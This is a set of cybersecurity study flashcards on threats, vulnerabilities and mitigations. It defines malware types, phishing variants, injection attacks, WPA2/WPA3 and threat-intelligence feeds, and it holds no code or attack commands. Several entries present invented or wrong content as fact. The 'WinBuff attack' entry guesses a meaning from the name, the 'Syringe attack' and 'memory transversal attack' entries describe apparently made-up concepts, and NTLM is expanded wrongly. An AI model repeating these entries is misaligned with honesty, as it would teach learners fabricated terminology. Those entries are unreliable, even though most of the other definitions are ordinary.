Cybersec + > Chapter 2: Threats, Vulnerabilities and Mitigations > Flashcards
Chapter 2: Threats, Vulnerabilities and Mitigations Flashcards
Logic Bomb
a string of malicious code intentionally inserted into a program to cause harm to a network when it meets certain conditions.
Trojan Horse
a type of malware that disguises itself as a legitimate program to trick users into downloading and installing it on their computer.
Rootkit
a type of malware that gives cybercriminals unauthorized access to a computer or network.
Worm
a type of malicious software (malware) that can self-replicate and spread rapidly across a network without any user interaction
WPA3
- Wi‐Fi Protected Access 3 (WPA‐3) is the most modern, most secure option
- Uses Simultaneous Authentication of Equals (SAE) instead of WPA2’s Pre-Shared Key (PSK). SAE is more secure and protects against offline dictionary attacks and password guessing attacks.
- encrypts each device’s data individually, which improves privacy and security.
https://www.securew2.com/wp-content/uploads/2023/08/Design-the-WPA2-Vs-802.1-X-Image.png
WPA2
- WPA2 is vulnerable to WEP attacks if the router is compatible with WEP systems.
- uses the Advanced Encryption Standard (AES), which is considered one of the most complex encryption technologies available. AES is used by the US government to protect classified data.
https://www.securew2.com/wp-content/uploads/2023/08/Design-the-WPA2-Vs-802.1-X-Image.png
Cross-site Scripting
Cross‐site scripting (XSS) involves entering a script into text areas that other users will view.
SQL Injection
a common attack vector that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed
On-path attack
a cyberattack where an attacker secretly intercepts and modifies communication between two parties.
What is a motivation for a Nation-state actor?
Nation‐state actors are typically advanced persistent threats (APTs) and their motivations commonly include espionage, data exfiltration, disruption/chaos, and war. Financial gain is more commonly associated with organized crime, blackmail with insider threats, and ethical with hacktivists.
Spear Phishing
a type of phishing attack that targets a specific individual, group or organization.
Bloatware
Unwanted or hidden software installed by the manufacturer or vendor on a new computer, device, or application.
Vishing
a cyberattack that involves tricking people into giving away sensitive information over the phone.
Smishing
a type of cybercrime that uses deceptive text messages to trick people into sharing sensitive information or performing actions that compromise their security.
Pretexting
creating a fake scenario to trick a victim into giving away sensitive information.
Business email compromise (BEC)
tricking people into sending money or sharing sensitive information through email.
Typo squatting
a form of cybersquatting (sitting on sites under someone else’s brand or copyright) that targets Internet users who incorrectly type a website address into their web browser
HIDS
a cybersecurity tool that monitors a computer’s internal systems and network packets for suspicious activity.
HIPS
which is a security tool that monitors and prevents threats to a computer system.
On-Path Attack
a cyberattack where a malicious actor intercepts and modifies communication between two parties.
Least Privilege Access
a cybersecurity strategy that limits user access to only what is needed to perform their job.
Watering Hole Attack
a cyberattack that infects a website that a target group frequently visits with malware, which then infects the target’s computer.
RDP (Remote Desktop Protocol)
Microsoft protocol that allows users to remotely access a Windows computer from another device.
NTLM (Network Trust Level Manager)
a Microsoft security protocol suite that authenticates users in a network environment.
Birthday attack
a cryptographic attack that uses the birthday problem in probability theory to find collisions in hash functions.
What is the difference between a misinformation campaign, pretexting campaign, impersonation campaign and a disinformation campaign?
- Misinformation Campaign: Spread of false or inaccurate information without the intent to deceive. The person or entity sharing it may believe it to be true.
Example: Sharing an outdated or incorrect statistic by mistake. - Pretexting Campaign: A social engineering tactic where an attacker creates a fabricated scenario (pretext) to trick a target into revealing sensitive information.
Example: Pretending to be an IT technician to get a user’s login credentials. - Impersonation Campaign: A tactic where an attacker assumes the identity of a trusted individual or entity to manipulate or deceive someone for malicious purposes.
Example: Posing as a CEO via email to instruct an employee to transfer funds (CEO fraud). - Disinformation Campaign: Deliberate dissemination of false information with the intention of misleading or causing harm.
Example: Spreading false rumors to discredit a political opponent during an election.
In short:
Misinformation = Unintentional false info.
Pretexting = Fabricated story to obtain info.
Impersonation = Posing as someone else to deceive.
Disinformation = Intentional spread of false info to deceive.
what threat vector is mostly impacted by how windows handles autorun.inf files?
The threat vector mostly impacted by how Windows handles autorun.inf files is removable media (such as USB drives or external hard drives).
Here’s why:
Autorun.inf files are configuration files used by Windows to automatically execute certain actions when a removable drive is inserted. This file specifies which programs to run, icons to display, or other actions the system should take.
Attack vector: Cyber attackers can manipulate autorun.inf files to automatically execute malicious code when a drive is plugged into a system. This makes it a popular vector for spreading malware, viruses, or other forms of malicious software.
Impact:
Malware propagation: Exploits the automatic execution feature to spread malware to systems without requiring user interaction.
Data theft: Malicious software can steal sensitive data once the infected removable media is inserted into a system.
System compromise: Attackers can gain unauthorized access to the system, potentially leading to a full system breach.
In response to this threat, modern versions of Windows have reduced the default functionality of autorun.inf files to minimize this risk.
difference between buffer overflow, logic bombing, race conditions and improper error handling? and how does this relate to multithreading?
- Buffer Overflow:
Definition: Occurs when a program writes more data to a buffer (a temporary storage area) than it can hold. This can overwrite adjacent memory, leading to crashes or allowing attackers to inject malicious code.
Impact: Can lead to system crashes, unauthorized code execution, and potential security vulnerabilities.
Example: A web application accepting input without validating its length, causing excess data to overflow and corrupt the memory. - Logic Bombing:
Definition: A malicious piece of code embedded in a program that triggers harmful actions (such as data deletion or system corruption) when specific conditions are met, like a certain date or event.
Impact: Causes delayed attacks, which can damage systems or data after a trigger occurs.
Example: A programmer places a hidden code that deletes files if their employee ID is removed from the payroll system. - Race Conditions:
Definition: Occurs when two or more threads or processes access shared resources concurrently, and the timing of their execution affects the program’s behavior. If not properly synchronized, this can lead to unpredictable outcomes.
Impact: Can cause data corruption, security breaches, and inconsistent program behavior.
Example: Two processes trying to update the same file simultaneously, leading to partial or incorrect data being written. - Improper Error Handling:
Definition: Occurs when an application does not handle errors appropriately, either by revealing sensitive information or failing to recover from an error condition securely.
Impact: Can expose sensitive information, such as stack traces or database errors, or lead to system vulnerabilities if errors are not properly managed.
Example: A web application that displays a full database error message to the user, revealing internal implementation details like database structure or query information.
Summary:
Buffer Overflow: Exceeds buffer capacity, potentially leading to memory corruption or code execution.
Logic Bombing: Malicious code that triggers harmful actions when certain conditions are met.
Race Conditions: Unpredictable behavior due to improper synchronization of concurrent processes.
Improper Error Handling: Failure to securely handle and manage errors, possibly exposing sensitive information or leaving the system vulnerable.
What is a WinBuff attack?
WinBuff” refers to a type of buffer overflow attack specifically targeting Windows systems, as “buff” could be shorthand for “buffer.” In cybersecurity, buffer overflow attacks involve overloading a buffer (an allocated space in memory) with more data than it can handle, which leads to unintended behaviors like crashes or even arbitrary code execution by an attacker.
Here’s how a buffer overflow attack generally works:
The attacker inputs data that exceeds the buffer’s storage capacity.
This excess data “overflows” into adjacent memory areas, potentially overwriting important information.
If executed successfully, this can allow the attacker to take control of the system, execute malicious code, or cause a denial of service (DoS).
what is a DLL injection?
A DLL attack involves exploiting Dynamic Link Library (DLL) files in a Windows operating system environment. Here are some common types and concepts related to DLL attacks:
DLL Injection: This technique allows an attacker to inject malicious code into a running process. By manipulating DLLs that a process loads, the attacker can gain control over that process, potentially leading to unauthorized actions.
DLL Hijacking: Attackers place a malicious DLL file in a directory where a legitimate application is expected to load a DLL. If the application loads the attacker’s DLL instead of the legitimate one, it can execute malicious code. This often occurs in scenarios where an application does not specify a full path to the DLL, leading to potential exploitation.
Trojanized DLLs: In this scenario, a legitimate DLL file is modified to include malicious payloads. When the compromised DLL is used by applications, it executes the attacker’s code.
Loading Order Attacks: Some applications have specific search paths for DLLs. By placing a malicious DLL in a location that takes precedence over the legitimate one, attackers can exploit this loading order to execute their code.
What is a Syringe attack?
A syringe attack is a type of cyber threat that involves the use of a physical device to compromise a system. It typically refers to scenarios where attackers use a small device, often resembling a syringe, to inject malicious code into a computer or network. This can happen in various ways, such as:
USB Devices: The “syringe” concept is sometimes used metaphorically to describe USB devices that are covertly inserted into a computer to deliver malware. These devices can exploit vulnerabilities in the operating system or applications.
Hardware Manipulation: Attackers might physically access a machine and use specialized tools to manipulate hardware components, gaining unauthorized access or executing malicious software.
Physical Security Breaches: The term can also extend to any physical method of injecting malicious code or exploiting systems, often taking advantage of weak physical security controls.
Prevention Measures
To guard against syringe attacks and similar threats, organizations can implement several strategies:
Physical Security: Enhance physical security measures to restrict unauthorized access to sensitive areas where computers and networks are housed.
USB Device Control: Use policies that restrict the use of unapproved USB devices and implement endpoint security solutions that can detect unauthorized hardware.
Regular Audits: Conduct regular security audits to identify vulnerabilities in both physical and digital security controls.
Awareness and proactive measures are crucial in mitigating the risks associated with syringe attacks and similar physical cyber threats.
what is a memory transversal attack
A memory traversal attack, often referred to as a memory corruption attack, involves exploiting vulnerabilities in a program’s memory management to gain unauthorized access to sensitive data or execute malicious code. Here are some common aspects of such attacks:
Key Concepts
Buffer Overflow: This occurs when a program writes more data to a buffer than it can hold, overwriting adjacent memory. Attackers can exploit this to inject malicious code.
Use After Free: This vulnerability occurs when a program continues to use a pointer after the memory it points to has been freed. Attackers can exploit this to manipulate the program’s behavior.
Heap Spraying: Attackers allocate large amounts of memory (the heap) to inject their payload, hoping that the program will execute this malicious code during its operation.
Pointer Manipulation: By modifying pointers in memory, attackers can redirect execution flow to their own code, potentially compromising the system.
Goals of Memory Traversal Attacks
Data Exfiltration: Accessing sensitive information stored in memory, such as passwords, encryption keys, or personal data.
Privilege Escalation: Gaining higher privileges within the operating system or application to execute unauthorized commands.
Denial of Service: Causing a program to crash or behave unexpectedly, disrupting service availability.
What are HIPS
HIPS (Host Intrusion Prevention System)
Definition: A security system installed on individual devices (hosts) to monitor and prevent malicious activities.
Function:
Detects suspicious behavior on the host.
Blocks potential threats in real-time.
Focuses on preventing attacks that have bypassed other layers of security (e.g., firewalls).
Example: It can prevent unauthorized changes to system files or registry settings.
What are ACLs
ACLs (Access Control Lists)
Definition: Rules that define which users or systems are allowed or denied access to specific resources within a network or system.
Function:
Determines the level of access based on permissions.
Can be applied to network routers, firewalls, and file systems.
Example: A firewall with an ACL might block traffic from certain IP addresses or allow only specific ports for communication.
what are VLANs
VLANs (Virtual Local Area Networks)
Definition: A method to create logically separated networks within a physical network infrastructure.
Function:
Segments network traffic to isolate different departments or functions.
Enhances security by restricting access between VLANs.
Example: A company might use VLANs to separate guest Wi-Fi traffic from internal corporate traffic.
what are least privilege lists
Least Privilege Principle
Definition: A security principle that ensures users and systems have the minimum level of access required to perform their tasks.
Function:
Reduces risk by limiting access to only what is necessary.
Prevents users from accessing unnecessary or sensitive resources.
Example: An employee in accounting might only have access to the finance database and not the company’s internal IT systems.
what are IoCs
ndicators of Compromise (IoCs) are pieces of forensic data or evidence that help identify potential malicious activity or security breaches in a system or network. IoCs are used by cybersecurity professionals to detect and respond to threats early on.
Common Types of IoCs:
File Hashes: Unique identifiers of files (like MD5, SHA-1) that can reveal if a known malicious file is present in a system.
IP Addresses: IPs that are associated with known malware or suspicious activity.
Domain Names: Malicious domains used by attackers to host malware or phishing schemes.
Email Addresses: Addresses used in phishing or spam campaigns.
Registry Changes: Unauthorized modifications to the system’s registry in Windows environments.
Malicious URLs: Links directing to harmful websites or files.
Unusual Network Traffic: Excessive or suspicious traffic patterns that could indicate data exfiltration or communication with command-and-control servers.
Behavioral Patterns: Abnormal system behaviors, such as unusual login times or failed login attempts.
What are threat feeds
A threat feed is a continuous stream of real-time data about potential or active cyber threats. It provides information that can help organizations detect, prevent, and respond to security incidents by tracking known malicious activities, indicators of compromise (IoCs), and emerging attack vectors.
Key Features of Threat Feeds:
Real-Time Updates: Continuously refreshed with the latest threat intelligence, including new malware, attack patterns, and compromised IPs or domains.
Indicators of Compromise (IoCs): Provides details like malicious IP addresses, domain names, file hashes, and suspicious URLs.
Actionable Intelligence: Helps security teams or automated systems take proactive measures, such as blocking traffic from certain IPs or tightening defenses against specific threats.
Integration with Security Tools: Often integrated into SIEM (Security Information and Event Management) systems, firewalls, or intrusion detection/prevention systems (IDS/IPS).
what is a real-time blackhole list
A Real-Time Blackhole List (RBL), also known as a DNS-based Blackhole List (DNSBL), is a database or list of IP addresses that are known to send spam, malicious traffic, or engage in suspicious activities. These lists are used to prevent unwanted traffic from reaching systems or networks in real time.
Key Features:
Real-Time Monitoring: The list is dynamically updated as new malicious IPs are identified.
Blacklisting: IP addresses associated with spamming, malware, or botnet activity are added to the list.
DNS Queries: Mail servers or other systems can query the RBL via DNS to check if an IP address is on the blacklist before accepting traffic or emails from it.
what is a vulnerability feed
A vulnerability feed is a real-time stream of data that provides information on newly discovered or existing vulnerabilities in software, hardware, and systems. Organizations use this information to stay informed about potential security weaknesses that could be exploited by attackers and to prioritize patching or mitigating those vulnerabilities.
Key Features of Vulnerability Feeds:
Real-Time Updates: Continuously updated with the latest vulnerability disclosures from various sources, including vendors, security researchers, and public databases.
CVE Information: Often includes Common Vulnerabilities and Exposures (CVE) identifiers, which are standardized references for specific vulnerabilities.
Severity Ratings: Provides vulnerability severity ratings, such as those based on the CVSS (Common Vulnerability Scoring System), helping organizations prioritize their responses.
Associated Threats: Some feeds also include data on exploits actively targeting specific vulnerabilities, helping organizations understand the risk.
what is an IP reputation feed
An IP reputation feed is a real-time data feed that provides information about the reputation of specific IP addresses based on their past or current behavior on the internet. This feed is used by security systems to help determine whether an IP address is involved in malicious activities, such as spamming, malware distribution, phishing, or botnet participation.
Key Features of an IP Reputation Feed:
Reputation Score: IP addresses are assigned scores or ratings that reflect their likelihood of being associated with malicious or suspicious activity.
Historical Behavior: The feed tracks the past activities of an IP address, such as sending spam or hosting malware.
Geolocation and Ownership: Information about the geographical location and ownership of the IP address may be included to provide additional context.
Real-Time Updates: IP reputation feeds are continuously updated to reflect the latest information, ensuring that new malicious IP addresses are flagged quickly.
what is adware
Adware is a type of software that automatically delivers advertisements to a user’s device, often without their consent. It is typically installed unknowingly alongside other software or downloaded through compromised websites. While not always malicious, adware can be intrusive and may pose privacy risks or lead to security vulnerabilities.
Key Characteristics of Adware:
Displays Ads: The primary purpose is to display advertisements, often in the form of pop-ups, banners, or redirections to sponsored websites.
Bundled Installation: It often comes packaged with legitimate software or disguised as something useful, and users may unintentionally install it.
Intrusive Behavior: Adware can bombard users with excessive ads, slowing down system performance and interrupting normal browsing activities.
Data Collection: Some adware collects user data, such as browsing habits, search queries, and location, to display targeted ads or sell the data to third parties.
Potential Security Risks: While not as harmful as malware, some adware can open the door to more serious infections or compromise user privacy.
what is a botnet
A botnet is a network of compromised computers or devices (called bots or zombies) that are controlled remotely by a cybercriminal, often without the knowledge of the device’s owner. Botnets are typically used to carry out large-scale malicious activities, such as distributed denial-of-service (DDoS) attacks, spamming, data theft, or cryptocurrency mining.
Key Characteristics of a Botnet:
Remote Control: The devices in a botnet are controlled by a bot herder (the attacker) through command-and-control (C2) servers or peer-to-peer networks.
Infection Methods: Devices are infected through malware, often via phishing emails, malicious downloads, or vulnerabilities in software. Once infected, they become part of the botnet.
Large Scale: A botnet can range from a few devices to millions, enabling powerful coordinated attacks.
what is DNS poisoning/spoofing
DNS poisoning, also known as DNS spoofing, is a cyber attack that manipulates the Domain Name System (DNS) to redirect users to malicious websites instead of the legitimate sites they intended to visit. This attack compromises the integrity of the DNS cache by inserting false information, leading to incorrect IP address resolutions.
Key Characteristics of DNS Poisoning:
Manipulation of DNS Records: Attackers alter DNS records, causing queries for specific domain names to return incorrect IP addresses.
Deceptive Redirection: Users may be redirected to fraudulent websites that can steal sensitive information, distribute malware, or serve unwanted ads.
Temporary or Permanent: DNS poisoning can be temporary (affecting the DNS cache of a specific server) or permanent (if attackers have control over a DNS server).
